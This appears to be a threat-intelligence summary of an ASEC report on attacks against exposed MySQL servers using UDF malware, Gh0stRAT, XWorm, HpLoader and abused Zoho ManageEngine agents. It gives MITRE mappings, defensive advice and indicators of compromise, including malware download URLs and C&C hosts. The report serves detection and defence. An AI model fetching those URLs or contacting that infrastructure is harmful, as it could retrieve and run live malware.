AhnLab SEcurity intelligence Center (ASEC) reports continuous attacks targeting poorly managed MySQL servers, mainly involving Gh0stRAT variants and multiple other malware strains such as XWorm and HpLoader. Threat actors exploit vulnerabilities by using UDF malware and abusing legitimate remote control tools like Zoho ManageEngine to gain control of infected systems. #MySQL #Gh0stRAT #XWorm #HpLoader #ZohoManageEngine
Keypoints
- MySQL servers remain a continuous target of attacks, especially those running in Windows environments with exposed 3306/TCP ports.
- Threat actors use User Defined Function (UDF) malware to execute malicious commands on infected MySQL servers, enabling further payload delivery.
- Gh0stRAT variants, including those with privilege escalation and screen capture capabilities, are predominantly found in these attacks.
- Remote Access Tools like XWorm are employed for extensive control features, including credential theft and DDoS attacks.
- HpLoader downloader is used in some attacks to deliver additional malware, often characterized by specific communication strings with its C&C server.
- Recently, legitimate remote control software Zoho ManageEngine is abused by threat actors to silently install and manage endpoint agents on compromised systems.
- Administrators are advised to restrict MySQL port exposure, enforce strong credential policies, minimize server permissions, and apply the latest security patches.
MITRE Techniques
- [T1110 ] Brute Force – Threat actors perform brute-force or dictionary attacks on exposed MySQL 3306/TCP ports to compromise administrator account credentials. (‘Threat actors scan for attack targets by performing brute-force attacks or dictionary attacks, much like the attacks against MS-SQL servers’)
- [T1210 ] Exploitation of Remote Services – Exploiting MySQL servers with poorly managed credentials to execute malicious DLLs and commands. (‘Threat actors upload DLL libraries containing malicious commands to the infected system and load them into the MySQL server’)
- [T1059 ] Command and Scripting Interpreter – UDF malware executes commands and downloads additional payloads from received URLs. (‘…there are also versions that support additional features, such as downloading files from URLs received as arguments and executing them’)
- [T1543 ] Create or Modify System Process – Gh0stRAT includes privilege escalation tools to gain higher system privileges. (‘…including a privilege escalation tool created by internally extracting certain commands from UACMe’)
- [T1071 ] Application Layer Protocol – HpLoader sends specific strings (“hpsocket”) to its C&C server during initial communication. (‘HpLoader… characterized by sending the “hpsocket” string to the C&C server during the initial communication’)
- [T1190 ] Exploit Public-Facing Application – Threat actors exploit exposed MySQL server ports and use malware to gain control over systems. (‘…they can compromise the credentials of administrator accounts, take control of the infected system, and install additional payloads’)
- [T1569 ] System Services – Abuse of legitimate remote control software Zoho ManageEngine for remote control without installing backdoors. (‘…Zoho ManageEngine is being abused recently… install the agent on infected systems in silent mode’)
Indicators of Compromise
- [MD5 Hash] Malware file hashes identified during investigation – 2cd59cff23a2e0f98e710bf52b799154, 33096e0bc0785ffb2094054bebb9be26, and 3 more hashes.
- [URL] Malicious payload download locations – http://39.108.132.22:8080/ceshi.exe, http://star.zcnet.net:7766/Server.exe
- [FQDN] Command and control server domains – star.zcnet.net, yyinfo8999.fit
- [IP Address] Malicious infrastructure IPs – 103.101.178.170, 154.204.177.54, 154.222.24.186, 39.108.132.22
Read more: https://asec.ahnlab.com/en/88514/